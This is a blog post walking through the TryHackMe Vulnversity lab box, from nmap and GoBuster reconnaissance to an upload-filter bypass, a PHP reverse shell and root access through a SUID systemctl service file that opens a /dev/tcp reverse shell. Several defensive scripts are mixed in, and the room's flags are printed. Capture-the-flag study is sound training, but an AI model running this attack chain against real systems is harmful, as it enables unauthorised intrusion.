What's the blog about?

Hello! Welcome to BlackWolf's Blog page

The aim of this blog is for me to annotate all of my work, ranging from book reviews and malware disassembly to projects I've been working on and the materials I've used to study. In short, this blog is a collection of all the projects I've worked on, the books I've read and the courses I've been taking, as well as small guides to each intentionally vulnerable machine that I've solved.

This blog page also provides a multitude of benefits besides me just having my work visible. In the world of IT, documentation is of huge importance, so this will drastically deepen my documentation skills and habits. It also lets me show what work I have done and showcase it to potential future employers. Because if it isn't documented, it never happened.

BlackWolf's TryHackMe Writeup [Vulnversity]

Offensive Security
TryHackMe's Vulnversity


"No matter where you are, the skills and requirements for a penetration tester will be the same. You’ll be required to have a good understanding of various aspects within information security including web applications, networks and sometimes even low-level technology like assembly. A good understanding of these technologies is essential to learning how to exploit them.

The aim of this path is to make you ready for real-world penetration testing by teaching you how to use industry-standard tools along with a methodology to find vulnerabilities in machines. By the time you complete this path, you will be well prepared for interviews and jobs as a penetration tester. To complete this path you should have a basic to a medium understanding of computing.

You can use this pathway to help you acquire the skills needed to go and get certified by well-known certifiers in the security industry."
- TryHackMe, 2020




What is TryHackMe and why should I look into it?


Well, if the name doesn't give it away, TryHackMe is a small organisation that has created a series of courses for those who want to get into penetration testing. It provides the means to learn, guides those who don't quite know where to get started and shows them how to use existing tools.


A series of open-source boxes has been supplied: vulnerable machines running service versions that are vulnerable to certain attacks. The goal with these machines is to find the vulnerabilities, exploit the right one and escalate privileges to "crack the box". This simulates real-world machines that may have services running on potentially vulnerable versions.


TryHackMe is an academy for all those who seek to get into cybersecurity. You sign up for their course, which they offer for $10 USD ($14~ AUD for myself), and once you pay for this surprisingly cheap subscription you're presented with a choice.



I elected to go with the Pathways path, deciding to have a crack at Series later down the track. 



Learning Pathways
Select a pathway and structure your learning


Looking through all of the potential courses, I decided to follow the Offensive Pentesting learning path. As this is being written I haven't done anything besides the tutorial, so this little write-up will be as raw as it is, happening live.

Getting Started

Let's get started with a few easy rooms which will give you practice in the following areas:
  • Active Reconnaissance
  • Vulnerability Scanning
  • Privilege Escalation
  • Web Application Attack



Having finished the Tutorial previously, this post will be a writeup of Vulnversity.


The Tasks 

The room's video is a step-by-step guide to the Vulnversity course. After watching only the first few minutes and then jumping ahead, I've decided not to watch the clip, as I'd like to see if I can complete the box without any hints or a walkthrough, whilst still following the room's steps of course. So, let's get straight into it.




1.  The first and foremost step is deploying our box; all we need to do is click the button and our machine starts right up!


Once we deploy our machine let's go ahead and start our attack box. The attack box is a virtual machine which TryHackMe has cleverly integrated into the web, creating a live cluster which we can interact with.

Once it's finished deploying, the attackbox should look like something along the lines of this

You can choose either to use TryHackMe's virtual machine or to boot up your own machine, preferably running Kali Linux, and connect to the box using OpenVPN. To find your .ovpn file visit
https://tryhackme.com/access 



You don't need to do these steps if you're using TryHackMe's web-integrated VM, but if you want to use your own machine you'll need to follow them to connect to the vuln box.
  1. Download your OpenVPN configuration pack.
  2. Run the following command in your terminal: sudo apt install openvpn
  3. Locate the full path to your VPN configuration file (normally in your ~/Downloads folder).
  4. Use your OpenVPN file with the following command: sudo openvpn /path/to/file.ovpn
Once you've followed the above steps your terminal should look like this:

If you're running this at a school or perhaps a workplace, they may have UDP or TCP blocked; you're able to change which protocol is used, and I had to change mine when not using my home network. If it's not blocked you should be fine.


And once you've connected to the Box, refresh the webpage we had a look at earlier and the 'Connected' status will show that we've connected and we're ready to begin this box!

(by the time anyone sees this writeup the virtual IP would've expired)





And now we begin the reconnaissance stage. I'll be supplying screenshots from the web-integrated virtual machine whilst simultaneously carrying this out on my laptop running Kali.
First, we'll be using a tool called Nmap, which stands for network mapper. Nmap is a commonly utilised tool for discovering hosts, open ports and the services behind them:

nmap -sV 10.10.125.102

Running the above command gives us the response shown on the left.
Here we can see that ports 21, 22, 139, 445, 3128 and 3333 are open. The -sV flag fingerprints these, so we can also see the services and versions running on them.




1.      Scan the box, how many ports are open?

With the ports: 
  • 21 
  • 22 
  • 139 
  • 445 
  • 3128
  • 3333
The answer: Six

2. What version of squid proxy is running on the machine?


looking closer at the supplied screenshot we can see on port 3128, a service called Squid HTTP Proxy, which through the mystical powers of deduction we can tell that the service version it's running on is

The answer: 3.5.12

3. How many ports are scanned with the flag -p-400?

The -p- flag specifies a port range; in this case 400 is parsed as the upper bound, so every port from 1 up to 400 is scanned and any open ones at or under 400 will be displayed, which here would be 21, 22 and 139. So, nmap will scan 400 ports to see if they're open.
The answer: 400

4. Using the nmap flag -n what will it not resolve?

This was a bit of an interesting one. I scoured through the entirety of nmap's 'man' page [man is short for manual] and could not find the -n flag to see what it does, so I went for the hint, which was [IP to hostname], at which my mind immediately went to "oh, DNS".
The answer: DNS

5. What is the likely operating system on this machine?

If we refer back to the supplied photo we can see that the Service Info line gives us Linux, and looking at port 3333 running Apache HTTPD we can see that the operating system it is running on is Ubuntu.
The answer: Ubuntu

6. What port is the web-server running on?

Casting our scornful gaze once more at the screenshot of the terminal, we can see that the service Apache HTTPd, which is a webserver, is running on port 3333.
The answer: 3333

And that is all for the reconnaissance section! Reconnaissance, be it passive or active, is one of the most critical stages of penetration testing; falling short on it, one would not know where to poke and prod, nor where to set one's sights. Make sure you properly follow through on executing this, as it's difficult to begin attacking if you don't know what or where you're attacking.
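To make the recon answers mechanical rather than eyeballed, here is a small parser, added for this writeup and not part of TryHackMe's material, that pulls open ports, a service's version and OS hints out of `nmap -sV` normal output, plus a helper that counts how many ports a -p spec such as -p-400 covers. The sample scan text is constructed to resemble the scan above; banners other than Squid and Apache are illustrative.

```python
import re

# Constructed sample of `nmap -sV` normal output, modelled on the scan in
# this writeup (not the real scan output; most banners are illustrative).
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return a list of (port, state, service, version) tuples."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, _proto, state, service, version = m.groups()
            rows.append((int(port), state, service, version.strip()))
    return rows

def open_ports(text):
    return [p for p, state, _, _ in parse_nmap(text) if state == "open"]

def service_version(text, name):
    """Version number from the first banner mentioning `name` (case-insensitive)."""
    for _, _, _, version in parse_nmap(text):
        if name.lower() in version.lower():
            m = re.search(r"(\d+(?:\.\d+)+)", version)
            return m.group(1) if m else version
    return None

def os_hints(text):
    """OS guesses: distro names in banners plus the 'Service Info: ... OS:' field."""
    hints = set()
    for _, _, _, version in parse_nmap(text):
        if "ubuntu" in version.lower():
            hints.add("Ubuntu")
    m = re.search(r"OS:\s*([^;]+)", text)
    if m:
        hints.add(m.group(1).strip())
    return hints

def count_port_spec(spec):
    """Ports covered by an nmap -p spec: '-400' means 1-400, '-' means 1-65535."""
    total = 0
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if "-" in part:
            lo = int(lo) if lo else 1
            hi = int(hi) if hi else 65535
        else:
            lo = hi = int(lo)
        total += hi - lo + 1
    return total
```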

Using a fast directory discovery tool called GoBuster you will locate a directory that you can use to upload a shell to.

How GoBuster works: when given a URL and a wordlist, it takes every word in that wordlist, requests URL + that word and checks whether the server returns a valid response. If it doesn't, it moves on to the next word; if the response is valid, it lists that directory. The end result is a list of every valid directory it found.

To install GoBuster, run sudo apt-get install gobuster. This installs the tool and adds it to your /bin, allowing you to run it from any directory within your attackbox.

To get started, you will need a wordlist for GoBuster (which it will go through quickly to identify whether a public directory is available). If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.


gobuster dir -u http://10.10.37.228:3333 -w /usr/share/wordlists/dirbuster

This is the result of the command. Here we can see the IP we passed as a URL, which doesn't have to go through DNS resolution, but it does need the 'http://' in front of it, so it should look like this: http://10.10.37.228

Since we're looking at scanning the Apache server, which is a web server running on port 3333, we point GoBuster at that port by adding :3333 after the URL. So it looks something like http://10.10.37.228:3333

Now we can see the result of its directory brute-forcing. The directories that came back as valid are:
/images, /css, /js and /internal. All of these are tagged with the [301] status.
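Seen from the web server's side, that behaviour is noisy: a burst of requests from one address where almost everything returns 404 and only the real directories answer 301. The script below is an added example (not from the room or its author) that runs that detection over constructed Apache access-log lines; the attacker address, guessed paths and user-agent are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format (standard); the sample fed to it is constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def make_sample_log():
    """Constructed log of a wordlist run against port 3333: four directories
    answer 301 (as in the writeup), the other guesses 404, plus one normal user."""
    lines = []
    words = ["images", "css", "js", "internal"] + [f"guess{i}" for i in range(26)]
    for i, word in enumerate(words):
        status = 301 if i < 4 else 404
        lines.append(f'10.10.25.93 - - [24/Nov/2020:10:01:{i:02d} +0000] '
                     f'"GET /{word} HTTP/1.1" {status} 300 "-" "gobuster/3.0.1"')
    lines.append('192.168.1.5 - - [24/Nov/2020:10:01:30 +0000] '
                 '"GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"')
    return "\n".join(lines)

def parse_log(text):
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["ip"], ts, m["path"], int(m["status"])))
    return events

def find_bruteforce(text, window_s=60, min_requests=20, min_404_ratio=0.8):
    """Flag IPs with a burst of >= min_requests inside window_s seconds that is
    dominated by 404s; 'hits' lists what the scanner actually found (non-404)."""
    per_ip = defaultdict(list)
    for ip, ts, path, status in parse_log(text):
        per_ip[ip].append((ts, path, status))
    flagged = {}
    for ip, evs in per_ip.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window so it spans at most window_s seconds
            while evs[end][0] - evs[start][0] > timedelta(seconds=window_s):
                start += 1
            burst = evs[start:end + 1]
            not_found = sum(1 for _, _, s in burst if s == 404)
            if len(burst) >= min_requests and not_found / len(burst) >= min_404_ratio:
                flagged[ip] = {
                    "requests": len(burst),
                    "not_found": not_found,
                    "hits": sorted({p for _, p, s in burst if s != 404}),
                }
                break
    return flagged
```

The "hits" list is the part worth keeping in an incident record: it is exactly the set of directories the scan confirmed, /internal included.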

Now, looking at these directories, we'll browse to one that strikes us as interesting. The one that piques my attention is the /internal directory, so we'll browse there by opening Firefox and going to http://10.10.37.228:3333/internal



Oh! Good fun! An upload function. Immediately my mind jumps to uploading a .PHP script and then browsing to it under /images so that it gets executed. If the uploaded shell runs when we browse to it, that permits us to execute commands on the Apache HTTPd server, a prime example of how to abuse improper sanitisation.

First, we must answer the only question in this section.

1. What is the directory that has an upload form page?

We already know the answer to this, as we browsed to the /internal URL and saw the upload page, so it'll be /internal.
The answer: /internal




Now here begins the part where things get fun: we've found an upload function which may be improperly sanitised, which we'll look into. If it is improperly sanitised it'll permit us to upload certain files, and if we can browse to these files we'll be able to pop a shell.

A shell is basically a payload that allows us to execute commands or create a TCP connection, or even a reverse_tcp connection where the target connects back to us; this is called a reverse shell.

To do this, we'll be using a tool called BurpSuite, an extremely powerful tool utilised by both professional penetration testers and web developers. To run it, type either Burp or burpsuite in your terminal. After clicking through and starting a temporary project you should be presented with this:



We're going to use Intruder (used for automating customised attacks). To begin, make a wordlist with the following extensions in:

Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.

Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:


1. Run this attack, what extension is allowed?

Annoyingly enough, when executing the attack all of the payload types return a 200 status, but after trial and error:
The answer: .phtml
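The reason .phtml got through is the classic denylist mistake: the form rejects ".php" but the PHP handler configuration shipped with Ubuntu's Apache module also maps .phtml to PHP. The added example below (mine, not code from the room) puts that weak check next to an allowlist-plus-magic-bytes check with a server-generated stored name; the magic values and the `DENIED_EXTENSIONS` set are assumptions about how such a form is typically written.

```python
import os
import secrets

# The weak check, modelled on what the writeup observed: a denylist that
# rejects ".php" but forgets the other extensions Apache hands to PHP.
DENIED_EXTENSIONS = {".php"}           # assumed denylist, not the room's source

def weak_is_allowed(filename):
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENIED_EXTENSIONS   # ".phtml", ".phar" etc. slip through

# Hardened version: allowlist of image extensions, each tied to the magic
# bytes the content must start with (PNG / JPEG / GIF signatures).
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

def hardened_is_allowed(filename, data):
    """Accept only allowlisted extensions whose bytes match that format's magic,
    so a PHP file renamed to .png is rejected along with .phtml."""
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED.get(ext)
    return magic is not None and data.startswith(magic)

def stored_name(filename, data):
    """Server-chosen name: random token plus the validated extension, so a
    client-supplied name such as 'shell.phtml.png' never reaches the upload dir."""
    if not hardened_is_allowed(filename, data):
        raise ValueError("rejected upload")
    return secrets.token_hex(8) + os.path.splitext(filename)[1].lower()
```

Serving the upload directory with PHP execution disabled (or from a host that has no PHP handler at all) is the other half of the fix; the name and content checks only stop the file getting there.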




Now that we know what extension we can use for our payload, we can progress.

We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you'll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

A GitHub repository written by pentestmonkey provides us with the necessary php script
Download the following reverse PHP shell here.

To gain remote access to this machine, follow these steps:

  1.    Edit the php-reverse-shell.php file and edit the ip to be your tun0 ip (you can get this by going to http://10.10.10.10 in the browser of your TryHackMe connected device).
  2.    Rename this file to php-reverse-shell.phtml, as if we left it as .PHP we wouldn't be able to upload it

  3.    We're now going to listen to incoming connections using netcat. Run the following command: nc -lvnp 1234

  4.    Upload your shell and navigate to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml - This will execute your payload

  5.    You should see a connection on your netcat session


Here we vim our shell and change the $ip to our own so we can create a reverse_tcp connection through the phtml shell. This is rather important, as the target needs to connect back to us, hence the reverse shell.



Here we're using Netcat to create a shell, ignore the incorrect port, we used port 1234 on the shell so we have to use the same port on netcat if we want to create a listener for that. Netcat is an extremely powerful tool which is frequently utilised, highly recommend looking further into it if you've got the time.

And voila! We have a shell!

Now let's see who we are by running whoami, which shows we're www-data. Not quite useful, so let's see who's on the machine by running awk -F: '{print $1}' /etc/passwd. Running this command shows us just the list of users rather than the entire block of information.

Looking at all the names on the right we see a few of interest but to cut to the chase the one we're really wanting to look at is Bill. So cd'ing into /home/bill and looking at the contents of his home directory we find the user.txt flag!

1. Which user who manages the webserver?

Well, after looking through all the interesting users we were able to figure out that the user who manages the webserver was in fact bill, the sly bugger.
The answer: Bill

2. What is the user flag?

Printing out user.txt by running cat user.txt whilst in the /home/bill directory gives us the flag.
The answer: 8bd7992fbe8a6ad22a63361004cfcedb



Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password it needs to write to the shadow file, which you do not have access to but root does, so the binary runs with root privileges to make the right changes.

Now, moving on, the first question was intriguing. I scoured the entirety of /usr/bin and /usr/ and couldn't find anything of particular interest, so failing that I went for the hint, which was: find / -user root -perm -4000 -exec ls -ldb {} \; Going ahead and executing this, we're thrown a huge terminal response.
Looking through this rather exciting response we can see all the binaries that run with root privileges; much of the output was "permission denied".

but looking at a few running within /bin/ we see a few interesting ones.

And immediately my eyes go straight to /bin/systemctl, which seems to be of interest.
First we need to find a directory where we have the appropriate permissions to do this, so let's cd into /home/bill. If we try mkdir filename we see that we don't have the correct permissions, so let's run ls -la.

1. Search for all SUID files. What file stands out?

Having just executed the above command, which finds files owned by root with the 4000 (setuid) permission bit, we scavenge through the large response (a lot more not shown) and find -rwsr-xr-x 1 root root 659856 /bin/systemctl
The answer: /bin/systemctl
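The same audit the hint command performs can be scripted, which is how a defender would baseline a host and spot an unexpected setuid-root binary such as /bin/systemctl. This is an added example, not part of the room; `EXPECTED_SUID` is an assumed baseline for an Ubuntu host, and `demo()` builds a throwaway directory with files owned by the current user (not root) purely to exercise the walk.

```python
import os
import stat
import tempfile

# Assumed baseline of binaries that are normally setuid-root on Ubuntu.
# Not exhaustive; generate the real one from a known-good build of your image.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "chfn",
                 "gpasswd", "newgrp", "ping", "pkexec"}

def mode_string_is_suid(mode):
    """True for an `ls -l` mode like '-rwsr-xr-x': the owner-execute slot is s/S."""
    return len(mode) == 10 and mode[3] in "sS"

def find_suid(root, owner_uid=0):
    """Walk `root` and return regular files with the setuid bit whose owner is
    `owner_uid` (0 = root), i.e. what `find / -user root -perm -4000` lists."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue            # permission denied etc., as the writeup saw
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                found.append(path)
    return sorted(found)

def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Drop baseline names; whatever is left (e.g. systemctl) needs a look."""
    return [p for p in paths if os.path.basename(p) not in baseline]

def demo():
    """Constructed tree: two setuid files and one normal one, owned by us."""
    base = tempfile.mkdtemp()
    for name, mode in (("passwd", 0o4755), ("systemctl", 0o4755), ("ls", 0o755)):
        path = os.path.join(base, name)
        open(path, "w").close()
        os.chmod(path, mode)
    found = find_suid(base, owner_uid=os.getuid())
    return ([os.path.basename(p) for p in found],
            [os.path.basename(p) for p in unexpected_suid(found)])

if __name__ == "__main__":
    print(demo())
```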

Alright, so knowing which binary we, an unprivileged user, can execute with root privileges, how can we abuse this SUID binary? As I'm not entirely familiar with the syntax for bash scripts, I'll quickly google how to privilege escalate with it and see if we can become root on this machine and grab the root flag. For reference, I'll be looking at this write-up, but I will detail what I do.


Alright, so on our attackbox we've created a file called root.service, and this is what it should contain:

[Unit]
Description=On our merry way to obtain root!


[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.25.93/9999 0>&1'


[Install]
WantedBy=multi-user.target

First, we type touch root.service, then we vim the file and type in the above (you should be able to copy and paste it in). Now all we need to do is get this onto the target system, which we'll do using netcat, following this netcat file transfer guide.

Now we need to find a directory that has the appropriate permissions for this, so let's cd into /home/bill. If we try mkdir [filename] we see that we don't have the correct permissions, so let's run ls -la.

Cool, so now we can see every folder within the root directory along with all of its permissions. Now to find one where everyone has read, write and execute permissions.

Looking closely we see that /tmp & /vmlinuz have rwx (read, write and execute) perms set up for all, so let's go ahead and cd into /tmp.

Easy, now let us test to see if we have the appropriate permissions by creating a folder. I named mine something tediously long for fun, but go ahead and name it anything you please.

And would you look at that! We created a folder. Now let's cd into that folder and get down and dirty.

On the box we'll run this command:
nc -l -p 2222 > root.service

Once you've run the above on the target machine, switch to a new terminal on your attack box and run:
nc -w 3 10.10.195.197 2222 < root.service

Once we execute that, the netcat listener and sender will both drop, and if we ls again the file will be there!

Payload Execution:
Before we can execute our root.service file, we need to place it onto the target file system if it's not there already. Once that is done, we just need to use systemctl to start our custom service. To do this, we first need to set up our listener, so let's go back to our attackbox and start a Netcat listener on port 9999:
nc -lvp 9999

Once we do that, we need to make sure we specify our root.service file location in our systemctl command arguments. So let's go ahead and create a symbolic link by typing:
/bin/systemctl enable /tmp/netcat/root.service
Once we've typed that on the box we should see this small message (shown on the left).

If you see this message then you've done all the above steps correctly; if not, something somewhere went wrong. Now that we've created a symbolic link, let's start the service and get a root shell. Do this by typing:
/bin/systemctl start root
After all this we should have a root shell back on our other attackbox terminal, where we were running the netcat listener for the root.service bash script. If all was followed you should see the terminal saying you're root, and then you just need to cd into the root directory and the root.txt flag will be sitting there waiting to be grabbed.

And there we have it, now to answer the last remaining question before we've finished the box.

1. Become root and get the last flag (/root/root.txt)

Following all the last steps, as shown in the provided screenshot, we know that
The answer: a58ff8579f0a9270368d33a9966c7fd5




And voila! You've done the very first box on TryHackMe! I'm not too sure about whoever is reading this, but I had an insane amount of fun doing this and I'm honestly growing quite fond of typing all this up. Doing this will also greatly help for the OSCP, as for that certificate you need to have a write-up of every box you do; if you're planning on taking it, I highly recommend doing the same and creating your very own writeup.

Good luck to you on your own penetration testing journey; don't be thrown off if this looks difficult. Go back through the tools and look at how they work. If you feel as if you're lacking the fundamentals, I highly recommend at least having a strong grasp of networking, as 80% of what we just did here revolves around networking: reverse_tcp connections, using netcat to tunnel between two machines and transfer files, opening up ports and so forth.

The tools we had used to complete this box:
    - nmap
    - GoBuster
    - burpsuite
    - netcat

Best of luck to all!

Regards,
- Blackwolf
11/24/2020